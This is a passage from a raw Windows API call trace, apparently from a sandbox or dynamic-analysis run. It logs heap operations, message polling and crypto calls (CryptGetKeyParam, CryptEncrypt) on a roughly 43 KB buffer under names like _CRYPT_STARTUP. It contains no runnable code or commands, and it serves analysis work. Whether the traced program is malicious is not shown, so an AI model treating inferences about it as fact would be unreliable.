Flags=0x0, Size=0x4) returned 0x9c26d8 [0183.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0183.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0183.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0183.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0183.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0183.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0183.835] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2808, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2808*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0183.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0183.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0183.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0183.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0183.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0183.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0183.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0183.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0183.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0183.835] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0183.835] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0183.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0183.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0183.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0183.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0183.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0183.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0183.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0183.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0183.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0183.836] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0183.836] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0183.837] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0183.838] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0183.838] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2638 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0183.838] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0183.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0183.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0183.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0183.920] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0183.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0183.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0183.921] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0183.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0183.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0183.922] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0183.923] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0183.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0183.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0183.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0183.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0183.928] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0183.929] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0183.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0183.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0183.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0183.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0183.931] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0183.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0183.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0183.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0183.933] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0183.934] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2808 | out: hHeap=0x8a0000) returned 1 [0183.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0183.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0183.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0183.935] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0183.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0183.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0183.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0183.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0183.936] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0183.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0183.938] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0183.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0183.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0183.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0183.939] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0183.939] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0183.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0183.941] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0183.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0183.942] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0183.942] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0183.942] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0183.942] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0184.081] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0184.081] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.081] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0184.081] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.081] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.081] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.081] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.081] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0184.082] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.082] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.082] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.082] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.082] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.082] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.084] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xa854, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xa860) returned 1 [0184.085] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.085] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.085] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.085] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.085] CharLowerBuffW (in: lpsz="byte[43105]", cchLength=0xb | out: lpsz="byte[43105]") returned 0xb [0184.085] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.088] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.088] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0184.088] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0184.089] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0184.089] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa854, dwBufLen=0xa860 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xa860) returned 1 [0184.089] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.089] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.090] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.092] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.092] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.092] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.092] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0184.092] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0184.092] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.092] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0184.092] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0184.092] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0184.093] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.093] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0184.093] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.107] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.107] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0184.107] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 